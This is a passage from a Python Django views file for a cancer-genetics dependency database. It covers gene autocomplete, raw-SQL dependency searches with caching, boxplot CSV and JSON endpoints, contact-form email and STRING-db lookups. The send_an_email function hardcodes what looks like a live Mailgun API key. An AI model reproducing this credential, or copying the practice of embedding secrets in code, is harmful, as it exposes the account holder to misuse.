defaulted to PANCAN (or \"ALL_HISTOTYPES\"), BUT now the tissue menu is populated by javascript after the user selects driver gene:\n # if histotype_name==\"\": histotype_name=\"PANCAN\"\n if histotype_name is None: histotype_name='' \n \n # Get the study short name (to display as default in the studies menu) for the study_pmid:\n study_short_name = get_study_shortname_from_study_list(study_pmid,study_list)\n\n # Get host IP (or hostname) To display the host in title for developing on localhost or pythonanywhere server:\n # current_url = request.get_full_path()\n # current_url = request.build_absolute_uri()\n # current_url = request.META['SERVER_NAME']\n current_url = request.META['HTTP_HOST']\n\n # Set the context dictionary to pass to the template. 
(Alternatively could add locals() to the context to pass all local variables, eg: return render(request, 'app/page.html', locals())\n context = {'search_by': search_by, 'gene_name': gene_name, 'histotype_name': histotype_name, 'study_pmid': study_pmid, 'study_short_name': study_short_name, 'driver_count': driver_count, 'driver_list': driver_list, 'driver_histotype_study_list': driver_histotype_study_list, 'target_list': target_list, 'histotype_list': histotype_list, 'study_list': study_list, 'experimenttype_list': experimenttype_list, 'current_url': current_url , 'settings_GOOGLE_ANALYTICS_KEY': settings.GOOGLE_ANALYTICS_KEY}\n return render(request, 'gendep/index.html', context)\n\n\ndef get_drivers(request):\n \"\"\" Returns list of driver genes in JSON format for the jquery-ui autocomplete searchbox AJAX mode \"\"\"\n \n # if request.is_ajax(): # Users can also access this from API scripts so not always AJAX\n name_contains = request.GET.get('name', '')\n # jQuery autocomplete sends the query as \"name\" and it expects back three fields: id, label, and value, eg:\n # [ {\"id\": \"ERBB2\", \"value\":\"ERBB2\",\"label\":\"ERBB2, ....\"},\n # {\"id\": \"ERBB3\", \"value\":\"ERBB3\",\"label\":\"ERBB3, ....\"},\n # ]\n\n # For each driver gene, the autocomplete box with display the 'label' then the 'value'.\n \n if name_contains == '':\n # Needs: (is_driver=True), not just: (is_driver)\n drivers = Gene.objects.filter(is_driver=True)\n else: \n # drivers = Gene.objects.filter(is_driver=True, gene_name__icontains=name_contains)\n # To search in both: 'gene_name' or 'prevname_synonyms', need to use the 'Q' object:\n drivers = Gene.objects.filter(is_driver=True).filter( Q(gene_name__icontains=name_contains) | Q(prevname_synonyms__icontains=name_contains) ) # could add: | Q(full_name__icontains=name_contains)\n\n results = []\n for d in drivers.order_by('gene_name'):\n results.append({\n 'id': d.gene_name,\n 'value': d.gene_name,\n 'label': d.gene_name + ' : ' + d.full_name + ' : ' + d.prevname_synonyms\n }) \n \n # For a simpler result set could use, eg: \n # results = list(Gene.objects.filter(gene_name__icontains=name_contains).values('gene_name'))\n \n return JsonResponse(results, safe=False) # needs 'safe=false' as results is an array, not dictionary.\n\n\ndef is_valid_ip(ip_address):\n \"\"\" Check validity of an IP address \"\"\"\n try:\n ip = ipaddress.ip_address(u'' + ip_address)\n return True\n except ValueError as e:\n return False\n \ndef get_ip_address_from_request(request):\n \"\"\" Makes the best attempt to get the client's real IP or return the loopback \"\"\" \n # Based on: \"easy_timezones.utils.get_ip_address_from_request\": https://github.com/Miserlou/django-easy-timezones\n \n # On PythonAnywhere the loadbalancer puts the IP address received into the \"X-Real-IP\" header, and also passes the \"X-Forwarded-For\" header as a comma-separated list of IP addresses. 
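The code below therefore checks X-Forwarded-For first (skipping private-range and invalid entries), then X-Real-IP, then REMOTE_ADDR, and finally falls back to the loopback address 127.0.0.1.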
The 'REMOTE_ADDR' contains load-balancer address.\n \n PRIVATE_IPS_PREFIX = ('10.', '172.', '192.', '127.')\n ip_address = ''\n x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR', '')\n if x_forwarded_for and ',' not in x_forwarded_for:\n if not x_forwarded_for.startswith(PRIVATE_IPS_PREFIX) and is_valid_ip(x_forwarded_for):\n ip_address = x_forwarded_for.strip()\n else:\n ips = [ip.strip() for ip in x_forwarded_for.split(',')]\n for ip in ips:\n if ip.startswith(PRIVATE_IPS_PREFIX):\n continue\n elif not is_valid_ip(ip):\n continue\n else:\n ip_address = ip\n break\n if not ip_address:\n x_real_ip = request.META.get('HTTP_X_REAL_IP', '') # PythonAnywhere load-balancer puts the real IP in this 'HTTP_X_REAL_IP'.\n if x_real_ip:\n if not x_real_ip.startswith(PRIVATE_IPS_PREFIX) and is_valid_ip(x_real_ip):\n ip_address = x_real_ip.strip()\n if not ip_address:\n remote_addr = request.META.get('REMOTE_ADDR', '') # On PythonAnywhere this is the load-balancer address.\n if remote_addr:\n if not remote_addr.startswith(PRIVATE_IPS_PREFIX) and is_valid_ip(remote_addr):\n ip_address = remote_addr.strip()\n if not ip_address:\n ip_address = '127.0.0.1'\n return ip_address\n \n \n \ndef send_an_email(emailfrom, emailto, emailreplyto, subject, text):\n \"\"\" Uses the 'mailgun.com' service (as free PythonAnywhere accounts don't have SMTP access) \"\"\"\n # mailgun.com records email in your logs: https://mailgun.com/cp/log \n # Better to keep this API auth key in a separate file, not on github:\n response = requests.post(\n \"https://api.mailgun.net/v3/sandboxfb49cd4805584358bdd5ee8d96240a09.mailgun.org/messages\",\n auth=(\"api\", \"key-ff52850192b21b271260779529ebd491\"),\n data={\"from\": emailfrom,\n \"to\": emailto,\n \"h:Reply-To\": emailreplyto,\n \"subject\": subject,\n \"text\": text\n })\n if not response.ok: print(\"Failed to send email as:\", response.content)\n return response.ok\n \n\n \ndef log_comment(request):\n \"\"\" Log and email comments/queries from the 'contacts' page \"\"\"\n # The user's input data is send by an HTML POST, not by Django url parameters as the message can be long:\n name = request.POST.get('name', '')\n emailreplyto = request.POST.get('email', '')\n comment = request.POST.get('comment', '')\n \n # Optional fields, which are currently commented out on the html template:\n # interest = request.POST.get('interest', '')\n # human = request.POST.get('human', '') # Result of a simple maths test, to check user is not a web spam robot.\n \n # To store the timezone: in \"cgdd/settings.py\" set: USE_TZ=True \n date = timezone.now()\n \n ip = get_ip_address_from_request(request)\n \n c = Comment.objects.create(name=name, email=emailreplyto, comment=comment, ip=ip, date=date)\n \n # Should probably check for email header injection attacks: https://www.reddit.com/r/Python/comments/15n6dw/sending_emails_through_python_and_gmail/\n # But mailgun probably checks for this.\n\n emailfrom=emailreplyto # Needs to be a valid email address or might give an exception?\n\n # The emailto address needs to be authorised on the mailgun.com \n emailto=\"cancergenetics@ucd.ie\" # or: \"Cancer Genetics \"\n #emailto=\"sbridgett@gmail.com\" # or: \"Stephen \" for testing.\n\n subject=\"Cgenetics Comment/Query: \"+str(c.id)\n\n # Datetime formatting: https://docs.python.org/3.5/library/datetime.html#strftime-strptime-behavior\n text = \"From: \"+name+\" \"+emailreplyto+\"\\nDate: \" + date.strftime(\"%a %d %b %Y at %H:%M %Z\") + \"\\n\\n\"+comment\n # 
https://docs.djangoproject.com/en/1.9/topics/i18n/timezones/\n \n email_sent = \"Email sent to cgenetics\" if send_an_email(emailfrom=emailfrom, emailto=emailto, emailreplyto=emailreplyto, subject=subject, text=text) else \"Failed to send email, but your message was saved in our comments database.\" # To the email could add: interest=interest\n\n context = {'name': name, 'email': emailreplyto, 'comment': comment, 'date': date, 'email_sent': email_sent}\n return render(request, 'gendep/log_comment.html', context, content_type=html_mimetype)\n \n\ndef get_histotype_full_name(histotype_name):\n \"\"\" Returns the human readable proper-case tissue name, eg: \n if input is 'PANCAN' returns 'Pan cancer', or if input 'SOFT_TISSUE' returns 'Soft tissue' \"\"\"\n if histotype_name == \"ALL_HISTOTYPES\":\n return \"All tissues\"\n else:\n return Dependency.histotype_full_name(histotype_name)\n\n\ndef get_study(study_pmid):\n \"\"\" Returns short study name (First author and year), for an imput Pub-Med Id \"\"\"\n if study_pmid == \"ALL_STUDIES\":\n return \"ALL_STUDIES\"\n try:\n study = Study.objects.get(pmid=study_pmid)\n except ObjectDoesNotExist: # Not found by the objects.get()\n study = None\n return study \n\n\n# def get_gene(gene_name):\ndef get_gene(entrez_id):\n \"\"\" Returns the Gene object (row from the Gene table) for the input gene_name (eg. 'ERBB2') \"\"\"\n # gene = None if gene_name == '' else Gene.objects.get(gene_name=gene_name) \n # if gene_name=='':\n if entrez_id=='':\n return None\n try:\n #gene = Gene.objects.get(gene_name=gene_name)\n gene = Gene.objects.get(entrez_id=entrez_id)\n except ObjectDoesNotExist: # gene_name not found by the Gene.objects.get()\n gene = None\n return gene\n \n \ndef build_dependency_query(search_by, entrez_id, histotype_name, study_pmid, wilcox_p=0.05, order_by='wilcox_p', select_related=None): # Now replaced by rawSQL query below.\n \"\"\" Builds the query used to extract the requested dependencies.\n search_by: 'driver' or 'target'\n entrez_id: must be sepcified and in the Genes table\n histotype_name: can be \"ALL_HISTOTYPES\" or a histotype in the model\n study_pmid: can be \"ALL_STUDIES\" or a study pubmed id in the Study table\n wilcox_p: the Dependency table only contains the rows with wilcox_p <=0.05 so must be same or less than 0.05\n order_by: defaults to wilcox_p, but could be 'target_id' or 'effect_size', etc\n select_related: can be None, or a string, or a list of strings (eg: ['driver__inhibitors', 'driver__ensembl_protein_id'] to efficiently select the inhibitors and protein_ids from the related Gene table in the one SQL query, rather than doing multiple SQL sub-queries later)\n \"\"\"\n error_msg = \"\"\n\n # Now changed to using entrez_id in the Dependency table so need to check Gene table for name (or send entrez_id from browser): \n if entrez_id == \"\":\n error_msg += 'Gene name is empty, but must be specified'\n return error_msg, None\n\n # Using driver_id=entrez_id (or target_id=entrez_id) avoids table join of (driver = gene):\n q = Dependency.objects.filter(driver_id=entrez_id) if is_search_by_driver(search_by) else Dependency.objects.filter(target_id=entrez_id)\n \n # As Query Sets are lazy, so can incrementally build the query, then it is evaluated once at end when it is needed:\n if histotype_name != \"ALL_HISTOTYPES\":\n q = q.filter( histotype = histotype_name ) # Correctly uses: =histotype_name, not: =histotype_full_name\n\n if study_pmid != \"ALL_STUDIES\":\n q = q.filter( study_id = study_pmid ) # Could use: (study = 
study) but using study_id should be more efficiewnt as no table join needed.\n\n # As the results are already filtered by R for wilcox_P<=0.05 then don't actually need to filter on this wilcox_p <= 0.05:\n # q = q.filter(wilcox_p__lte = wilcox_p) # Only list significant hits (ie: p<=0.05). '__lte' means 'less than or equal to'\n\n print(\"build_dependency Query SQL:\",q.query)\n print(\"build_dependency select_related:\",select_related)\n \n if select_related is not None: \n if isinstance(select_related, str) and select_related != '':\n q = q.select_related(select_related)\n elif isinstance(select_related, list) or isinstance(select_related, tuple):\n for column in select_related:\n q = q.select_related(column)\n else:\n error_msg += \" ERROR: *** Invalid type for 'select_related' %s ***\" %(type(select_related))\n print(error_msg)\n \n if order_by != None and order_by != '':\n q = q.order_by(order_by) # usually 'wilcox_p', but could be: order_by('target_id') to order by target gene name\n\n return error_msg, q\n\n\n# Show entrez_id be the filter now instead of gene_name?\ndef build_rawsql_dependency_query(search_by, entrez_id, histotype_name, study_pmid, query_type, order_by='wilcox_p'): # wilcox_p=0.05, select_related=None): \n \"\"\" Builds raw SQL query, which permits use of AS in SQL, and more efficient. https://docs.djangoproject.com/en/1.10/topics/db/sql/ \n and overcomes problem that the latest Django 1.10 has with 'selected_related': https://code.djangoproject.com/ticket/24687 \n and http://eboreimeoikeh.com/zealcreationz.com/django/docs/releases/1.10.txt and http://fossies.org/diffs/Django/1.9.8_vs_1.10/tests/select_related/tests.py-diff.html \"\"\"\n # As the results are already filtered by R for wilcox_P<=0.05 then don't actually need to filter on this wilcox_p <= 0.05\n\n error_msg = ''\n\n filter = \"D.%s = %%s\" %(search_by) # AND D.wilcox_p <= %%s\n # Now changed to using entrez_id in the Dependency table so need to check Gene table for name (or send entrez_id from browser):\n # params = [gene_name] # , wilcox_p\n params = [entrez_id] # , wilcox_p\n\n # filter = \"D.gene_name = %%s\" # AND D.wilcox_p <= %%s\n\n if histotype_name != \"ALL_HISTOTYPES\":\n filter += \" AND D.histotype = %s\" # Correctly uses: =histotype_name, not: =histotype_full_name \n params.append(histotype_name)\n\n if study_pmid != \"ALL_STUDIES\":\n filter += \" AND D.pmid = %s\" # Could use: (study = study) but using study_id should be more efficient as no table join needed.\n params.append(study_pmid)\n\n select = 'target' if search_by=='driver' else 'driver'\n\n columns = \"D.id, D.%s AS entrez_id, D.wilcox_p, D.effect_size, D.zdiff, D.interaction, D.pmid, D.multi_hit\" %(select) # Raw query must include the primary key (D.id). 
Should entrez_id be added now as is primary key to Gene table now?\n\n # related_columns = \", G.inhibitors, G.ensembl_protein_id\"\n # related_join = \" INNER JOIN gendep_gene G ON (D.%s = G.gene_name)\" %(select) # Used for both query_types.\n related_columns = \", G.gene_name, G.inhibitors, G.ensembl_protein_id\"\n related_join = \" INNER JOIN gendep_gene G ON (D.%s = G.entrez_id)\" %(select) # Used for both query_types.\n\n if query_type == 'dependency_gene_study':\n# related_columns += \", G.full_name, G.entrez_id, G.ensembl_id, G.prevname_synonyms, S.short_name, S.experiment_type, S.title\" # don't need 'study__pmid' (as is same as d.study_id)\n related_columns += \", D.histotype, G.full_name, G.ensembl_id, G.prevname_synonyms, S.short_name, S.experiment_type, S.title\" # don't need 'study__pmid' (as is same as d.study_id)\n related_join += \" INNER JOIN gendep_study S ON (D.pmid = S.pmid)\"\n elif query_type != 'dependency_gene':\n error_msg += \" ERROR: *** Invalid 'query_type': %s ***\" %(query_type)\n\n # Not searching for: gendep_dependency.driver, gendep_dependency.mutation_type, gendep_dependency.boxplot_data, etc\n\n rawsql = (\"SELECT \" + columns + related_columns +\n \" FROM gendep_dependency D\" + related_join +\n \" WHERE (%s) ORDER BY D.%s ASC\") %(filter, order_by)\n\n print(\"build_rawsql:\",rawsql)\n return error_msg, Dependency.objects.raw(rawsql, params)\n\n \n\ndef gene_ids_as_dictionary(gene):\n \"\"\" To return info about alternative gene Ids as dictionary, for an JSON object for AJAX \"\"\"\n return {\n 'gene_name': gene.gene_name,\n 'entrez_id': gene.entrez_id,\n 'ensembl_id': gene.ensembl_id,\n 'ensembl_protein_id': gene.ensembl_protein_id,\n 'vega_id': gene.vega_id,\n 'omim_id': gene.omim_id,\n 'hgnc_id': gene.hgnc_id,\n 'cosmic_id': gene.cosmic_id,\n 'uniprot_id': gene.uniprot_id\n }\n\ndef gene_info_as_dictionary(gene):\n \"\"\" To return info about the gene as a JSON object for AJAX \"\"\"\n return { \n 'gene_name': gene.gene_name,\n 'full_name': gene.full_name,\n 'synonyms': gene.prevname_synonyms,\n 'ids': gene_ids_as_dictionary(gene),\n }\n \n\n# Should entrez_id be a parameter now, as is primary key? \ndef get_dependencies(request, search_by, entrez_id, histotype_name, study_pmid):\n \"\"\" Fetches the dependency data from cache (if recent same query) or database, for the main search result webpage.\n After \"Search\" button on the \"index.html\" page is pressed an AJAX requst sends four fields: search_by, entrez_id, histotype, and study_pmid.\n For paginated table, could add [start_row, and number_of_rows to return]\n Returns JSON formatted data for the dependency search result table, or an error message in JSON format.\n GET request is faster than POST, as POST makes two http requests, GET makes one, the Django url parameters are a GET request.\n \"\"\"\n print(\"In get_dependencies: \",request, search_by, entrez_id, histotype_name, study_pmid)\n \n timing_array = [] # Using an array to preserve order of times on output.\n start = datetime.now()\n \n ajax_results_cache_version = '3' # version of the data in the database and of this JSON format. Increment this on updates that change the database data or this JSON format. 
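Note that cache.set() below passes version= while the cache.get() call does not, so the two address different versioned keys; the '_v' suffix already embedded in cache_key makes the separate version= argument redundant.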
See: https://docs.djangoproject.com/en/1.9/topics/cache/#cache-versioning\n \n # Avoid storing a 'None' value in the cache as then difficult to know if was a cache miss or is value of the key\n # cache_key = search_by+'_'+gene_name+'_'+histotype_name+'_'+study_pmid+'_v'+ajax_results_cache_version\n cache_key = search_by+'_'+entrez_id+'_'+histotype_name+'_'+study_pmid+'_v'+ajax_results_cache_version\n cache_data = cache.get(cache_key, 'not_found') # To avoid returning None for a cache miss.\n if cache_data != 'not_found': \n # start = get_timing(start, 'Retrieved from cache', timing_array)\n # The 'timings': timing_array in the cached version is saved from the actual previous query execution, is not the timing for retrieving from the cache.\n return HttpResponse(cache_data, json_mimetype) # version=ajax_results_cache_version)\n\n search_by_driver = is_search_by_driver(search_by) # otherwise is by target\n select_related = [ 'target__inhibitors', 'target__ensembl_protein_id' ] if search_by_driver else [ 'driver__inhibitors', 'driver__ensembl_protein_id' ]\n\n #print(\"get_drivers(<#request#>)_dependency_query:\", \"search_by:\",search_by, \"gene_name:\",gene_name, \"histotype_name:\",histotype_name, \"study_pmid:\",study_pmid, \"select_related:\",select_related)\n print(\"build_dependency_query:\", \"search_by:\",search_by, \"entrez_id:\",entrez_id, \"histotype_name:\",histotype_name, \"study_pmid:\",study_pmid, \"select_related:\",select_related) \n\n RAW = True\n if RAW:\n error_msg, dependency_list = build_rawsql_dependency_query(search_by, entrez_id, histotype_name, study_pmid, order_by='wilcox_p', query_type='dependency_gene') \n else:\n # Specify 'select_related' columns on related tables, otherwise the template will do a separate SQL query for every dependency row to retrieve the driver/target data (ie. hundreds of SQL queries on the Gene table)\n # Can add more select_related columns if needed, eg: for target gene prevname_synonyms: target__prevname_synonyms \n # error_msg, dependency_list = build_dependency_query(search_by, gene_name, histotype_name, study_pmid, order_by='wilcox_p', select_related=select_related) \n error_msg, dependency_list = build_dependency_query(search_by, entrez_id, histotype_name, study_pmid, order_by='wilcox_p', select_related=select_related)\n \n if error_msg != '': return json_error(\"Error: \"+error_msg)\n \n \n print(\"Query SQL:\",dependency_list.query)\n \n # gene = get_gene(gene_name)\n gene = get_gene(entrez_id)\n # if gene is None: return json_error(\"Error: Gene '%s' NOT found in Gene table\" %(gene_name))\n if gene is None: return json_error(\"Error: Gene entrez_id '%s' NOT found in Gene table\" %(entrez_id))\n \n # Only need current_url to include it in title/browser tab on hoover, for testing.\n #current_url = request.META['HTTP_HOST'] # or: request.META['SERVER_NAME']\n\n start = get_timing(start, 'Query setup', timing_array)\n \n results = []\n csv = ''\n div = ';' # Using semicolon as the div, as comma may be used to separate the inhibitors\n count = 0\n \n # \"The 'iterator()' method ensures only a few rows are fetched from the database at a time, saving memory, but aren't cached if needed again in this function. 
This iterator version seems slightly faster than the non-iterator version.\n# for d in dependency_list.iterator(): <-- RawQuery doesn't have iterator()\n for d in dependency_list:\n count += 1\n if RAW:\n #interaction = d.interaction\n #if interaction is None: interaction = '' # shouldn't be None, as set by ' add_ensembl_proteinids_and_stringdb.py' script to ''.\n \n #interaction_protein_id = d.target.ensembl_protein_id if search_by_driver else d.driver.ensembl_protein_id\n #if interaction_protein_id is None: interaction_protein_id = '' # The ensembl_protein_id might be empty.\n #interaction += '#'+interaction_protein_id # Append the protein id so can use this to link to string-db.org\n\n #inhibitors = d.target.inhibitors if search_by_driver else d.driver.inhibitors\n #if inhibitors is None: inhibitors = '' # shouldn't be None, as set by 'drug_inhibitors.py' script to ''.\n \n # For driver or target below, the '_id' suffix gets the underlying gene name, rather than the foreign key Gene object, so more efficient as no SQL join needed: https://docs.djangoproject.com/en/1.9/topics/db/optimization/#use-foreign-key-values-directly\n # Similarly 'study_id' returns the underlying pmid number from the Dependency table rather than the Study object.\n # wilcox_p in scientific format with no decimal places (.0 precision), and remove python's leading zero from the exponent.\n results.append([\n d.gene_name, # WAS: d.target_id if search_by_driver else d.driver_id,\n # Optionally could add: d.entrez_id,\n format(d.wilcox_p, \".0e\").replace(\"e-0\", \"e-\"),\n format(d.effect_size*100, \".1f\"), # As a percentage with 1 decimal place\n format(d.zdiff,\".2f\"), # Usually negative. Two decimal places\n d.study_id,\n d.multi_hit,\n d.interaction + '#' + d.ensembl_protein_id,\n d.inhibitors,\n d.histotype if histotype_name == \"ALL_HISTOTYPES\" else '' # Only need to send the histotype column when all_histotypes, (as otherwise when a specific histotype is given in the search then only rows with that histotype will be returned, so the webpage will know the histotype from the query)\n ])\n \n else: # Not RAW sql \n interaction = d.interaction\n if interaction is None: interaction = '' # shouldn't be None, as set by ' add_ensembl_proteinids_and_stringdb.py' script to ''.\n \n interaction_protein_id = d.target.ensembl_protein_id if search_by_driver else d.driver.ensembl_protein_id\n if interaction_protein_id is None: interaction_protein_id = '' # The ensembl_protein_id might be empty.\n interaction += '#'+interaction_protein_id # Append the protein id so can use this to link to string-db.org\n\n inhibitors = d.target.inhibitors if search_by_driver else d.driver.inhibitors\n if inhibitors is None: inhibitors = '' # shouldn't be None, as set by 'drug_inhibitors.py' script to ''.\n \n # For driver or target below, the '_id' suffix gets the underlying gene name, rather than the foreign key Gene object, so more efficient as no SQL join needed: https://docs.djangoproject.com/en/1.9/topics/db/optimization/#use-foreign-key-values-directly\n # Similarly 'study_id' returns the underlying pmid number from the Dependency table rather than the Study object.\n # wilcox_p in scientific format with no decimal places (.0 precision), and remove python's leading zero from the exponent.\n results.append([\n d.target_id if search_by_driver else d.driver_id,\n format(d.wilcox_p, \".0e\").replace(\"e-0\", \"e-\"),\n format(d.effect_size*100, \".1f\"), # As a percentage with 1 decimal place\n format(d.zdiff,\".2f\"), # Usually negative. 
Two decimal places\n d.study_id,\n d.multi_hit,\n interaction,\n inhibitors, # Formatted above\n d.histotype if histotype_name == \"ALL_HISTOTYPES\" else '' # Only need to send the histotype column when all_histotypes, (as otherwise when a specific histotype is given in the search then only rows with that histotype will be returned, so the webpage will know the histotype from the query)\n ])\n \n\n start = get_timing(start, 'Dependency results', timing_array)\n \n # results_column_names = ['Target','Wilcox_p','Effect_size','ZDiff','Histotype','Study_pmid','Inhibitors','Interactions'] # Could add this to the returned 'query_info'\n\n query_info = {'search_by': search_by,\n 'gene_entrez': entrez_id,\n 'gene_name': gene.gene_name,\n 'gene_full_name': gene.full_name,\n 'gene_synonyms': gene.prevname_synonyms,\n 'gene_alteration_considered': gene.alteration_considered, # alteration_considered only applies to driver genes.\n 'histotype_name': histotype_name,\n 'study_pmid': study_pmid,\n 'dependency_count': count, # should be same as: dependency_list.count(), but dependency_list.count() could be another SQL query. # should be same as the number of elements passed in the results array.\n }\n # 'current_url': current_url # No longer needed.\n \n data = json.dumps({\n 'success': True,\n 'timings': timing_array,\n 'query_info': query_info,\n 'gene_ids': gene_ids_as_dictionary(gene),\n 'results': results\n }, separators=[',',':']) # The default separators=[', ',': '] includes whitespace which I think makes the transfer to the browser larger. As ensure_ascii is True by default, the non-ascii characters are encoded as \\uXXXX sequences; alternatively can set ensure_ascii to false which will allow unicode I think.\n \n start = get_timing(start, 'Json dump', timing_array) # Although too late to add this time to the json already encoded above.\n\n cache.set(cache_key, data, version=ajax_results_cache_version) # could use the add() method instead, but better to update anyway.\n # Could gzip the cached data (using GZip middleware's gzip_page() decorator for the view, or in code https://docs.djangoproject.com/en/1.9/ref/middleware/#module-django.middleware.gzip )\n # GZipMiddleware will NOT compress content if any of the following are true:\n # - The content body is less than 200 bytes long.\n # - The response has already set the Content-Encoding header.\n # - The request (the browser) hasn’t sent an Accept-Encoding header containing gzip.\n # Another option is using cache_control() to permit browser caching by setting the Vary header: https://docs.djangoproject.com/en/1.9/topics/cache/#using-vary-headers\n # \"(Note that the caching middleware already sets the cache header’s max-age with the value of the CACHE_MIDDLEWARE_SECONDS setting. 
If you use a custom max_age in a cache_control decorator, the decorator will take precedence, and the header values will be merged correctly.)\"\n # https://www.pythonanywhere.com/forums/topic/376/\n # and an example of gzip using flask: https://github.com/closeio/Flask-gzip\n # https://github.com/closeio/Flask-gzip/blob/master/flask_gzip.py\n\n #print(timing_array) # To django console/server log\n return HttpResponse(data, content_type=json_mimetype) # As data is already in json format, not using JsonResponse(data, safe=False) which would try to convert it to JSON again.\n \n\n\ndef get_boxplot(request, dataformat, driver_name, target_name, histotype_name, study_pmid):\n \"\"\" Returns data for plotting the boxplots, in JSON or CSV format\n The 'target_variant' parameter is no longer used for the Achilles data, as only the target_variant with the best wilcox_p value is stored in the Dependency table \"\"\"\n try: \n # d = Dependency.objects.get(driver_id=driver_name, target_id=target_name, histotype=histotype_name, study_id=study_pmid)\n d = Dependency.objects.get(driver__gene_name=driver_name, target__gene_name=target_name, histotype=histotype_name, study_id=study_pmid)\n \n except ObjectDoesNotExist: # ie. not found by the objects.get()\n error_msg = \"Error, Dependency: driver='%s' target='%s' tissue='%s' study='%s' NOT found in Dependency table\" %(driver_name, target_name, histotype_name, study_pmid)\n if dataformat[:4] == 'json': # for request 'jsonplot' or 'jsonplotandgene'\n return json_error(error_msg)\n else: \n return plain_error(error_msg)\n \n if dataformat == 'csvplot':\n return HttpResponse(d.boxplot_data, content_type=csv_mimetype)\n\n if dataformat == 'jsonplot':\n return JsonResponse({'success': True, 'boxplot': d.boxplot_data}, safe=False)\n \n if dataformat == 'jsonplotandgene': # when the browser doesn't already have the target gene_info and ncbi_summary cached.\n try:\n gene = Gene.objects.get(gene_name=target_name)\n gene_info = gene_info_as_dictionary(gene);\n gene_info['ncbi_summary'] = gene.ncbi_summary # To include the gene's ncbi_summary\n return JsonResponse( { 'success': True,\n 'gene_info': gene_info,\n 'boxplot': d.boxplot_data },\n safe=False )\n except ObjectDoesNotExist: # Not found by the objects.get() \n return json_error( \"Error, Gene: target='%s' NOT found in Gene table\" %(target_name) )\n\n elif dataformat=='csv' or dataformat=='download': \n # 'csv' is for users to request the boxplot data via the API\n # 'download' is for the 'Download as CSV' button on the SVG boxplots\n lines = d.boxplot_data.split(';')\n \n lines[0] = \"Tissue,CellLine,Zscore,Altered\";\n # This first line is the count, range, and boxplot_stats.\n \n # As this range and boxplot_stats are now calculated by the JavaScript in svg_boxplots.js, this line can be removed from future R output, so in future we need to prepend to the list, rather than replacing the first line here:\n # lines.insert(0, \"Tissue,CellLine,Zscore,Altered\")\n # or just: \n # response = HttpResponse(\"Tissue,CellLine,Zscore,Altered\\n\" + (d.boxplot_data.replace(\";\",\"\\n\")), content_type=csv_mimetype)\n response = HttpResponse(\"\\n\".join(lines), content_type=csv_mimetype)\n if dataformat=='download':\n # Add to the HttpResponse object with the CSV/TSV header and downloaded filename:\n dest_filename = ('%s_%s_%s_pmid%s.csv' %(driver_name,target_name,histotype_name,study_pmid)).replace(' ','_') # To also replace any spaces with '_'\n # NOTE: Using .csv as Windows (and Mac) file associations will then know to open 
the file with Excel, whereas if it is .tsv then Windows won't open it with Excel.\n response['Content-Disposition'] = 'attachment; filename=\"%s\"' %(dest_filename)\n return response\n \n else:\n print(\"*** Invalid dataformat requested for get_boxplot() ***\")\n return html_error(\"Error, Invalid dataformat '\"+dataformat+\"' requested for get_boxplot()\")\n \n \n \ndef stringdb_interactions(required_score, protein_list):\n \"\"\" Retrieve the list of protein_ids with an interaction of >=required_score\n 'required_score' is typically 400, or 700 (for 40% or 70% confidence)\n 'protein_list' is ensembl protein_ids separated with semicolons ';'\n NOTE: The pythonanywhere.com free account blocks requests to servers not on their whitelist. String-db.org has now been added to their whitelist, so this function works ok on free or paid accounts.\n This function creates a request in the format: http://string-db.org/api/psi-mi-tab/interactionsList?network_flavor=confidence&limit=0&required_score=700&identifiers=9606.ENSP00000269571%0D9606.ENSP00000357883%0D9606.ENSP00000345083\n \"\"\"\n \n stringdb_options=\"network_flavor=confidence&species=9606&limit=0&required_score=\"+required_score; \n # The online interactive stringdb uses: \"required_score\" 400, and \"limit\" 0 (otherwise by default string-db will add 10 more proteins). Optionally add the parameter: &additional_network_nodes=0\n \n protein_list = protein_list.replace(';', '%0D') # Replace semicolon with the url encoded newline character that String-db expects between protein ids.\n\n url = \"http://string-db.org/api/psi-mi-tab/interactionsList?\"+stringdb_options+\"&identifiers=\"+protein_list;\n \n # For very large result sets could use streaming: http://stackoverflow.com/questions/16870648/python-read-website-data-line-by-line-when-available\n # import requests\n # r = requests.get(url, stream=True)\n # for line in r.iter_lines():\n # if line: print line\n\n req = Request(url)\n try:\n response = urlopen(req)\n except URLError as e:\n if hasattr(e, 'reason'): # The reason for this error. It can be a message string or another exception instance.\n if isinstance(e.reason, str):\n return False, \"We failed to reach a server: \" + e.reason\n else: \n raise e.reason\n elif hasattr(e, 'code'):\n return False, \"The server couldn't fulfill the request. Error code: \" + str(e.code) # str() needed as e.code is an integer\n else: # response is fine\n return True, response.read().decode('utf-8').rstrip().split(\"\\n\") # read() returns 'bytes' so need to convert to a python string\n\n\ndef get_stringdb_interactions(request, required_score, protein_list=None):\n \"\"\" Returns the subset of proteins in protein_list that string-db reports have interactions with at least one other protein in the protein_list. This is to remove the unconnected proteins from the image \"\"\"\n \n # The request can optionally be sent by an HTML GET or POST. 
POST means no limit to the number of proteins sent, whereas GET or Django url() params are limited by the length of URL the web browser permits.\n if (protein_list is None) or (protein_list == ''):\n protein_list = post_or_get_from_request(request,'protein_list') \n \n # Fetch the subset of protein_list that have actual interactions with other proteins in the list:\n success, response = stringdb_interactions(required_score, protein_list)\n\n if not success: return plain_error('ERROR: '+response)\n\n if response == '' or response == ['']: return PlainResponse(\"\") # No interacting proteins. (The reply is split into a list in stringdb_interactions(), so an empty reply arrives as [''].)\n # was: or response==\"\\n\", but the newline in an empty response is rstrip'ed in stringdb_interactions()\n \n # Dictionary to check later if a returned protein was in the original list:\n initial_protein_dict = dict((protein,True) for protein in protein_list.split(';'))\n \n err_msg = '' \n final_protein_dict = dict()\n for line in response:\n if line == '': continue\n cols = line.rstrip().split(\"\\t\")\n if len(cols)<2:\n err_msg+=\"\\nNum cols = %d (but expected >=2) in line: '%s'\" %(len(cols),line.rstrip())\n continue # otherwise cols[1] below would raise an IndexError (the cytoscape() version below already skips such lines)\n \n for i in (0,1): # col[0] and col[1] are the pair of interacting proteins\n protein = cols[i].replace('string:', '') # as returned ids are prefixed with 'string:'\n if protein in initial_protein_dict: final_protein_dict[protein] = True\n else: err_msg+=\"\\n*** Protein%d returned '%s' is not in original list ***\" %(i+1,protein)\n \n if err_msg != '':\n print(err_msg)\n return plain_error('ERROR:'+err_msg)\n \n protein_list2 = ';'.join(final_protein_dict.keys())\n return PlainResponse(protein_list2)\n\n \n \ndef cytoscape(request, required_score, protein_list=None, gene_list=None):\n \"\"\" Displays the cytoscape network of protein interactions.\n This receives the protein_list (eg: 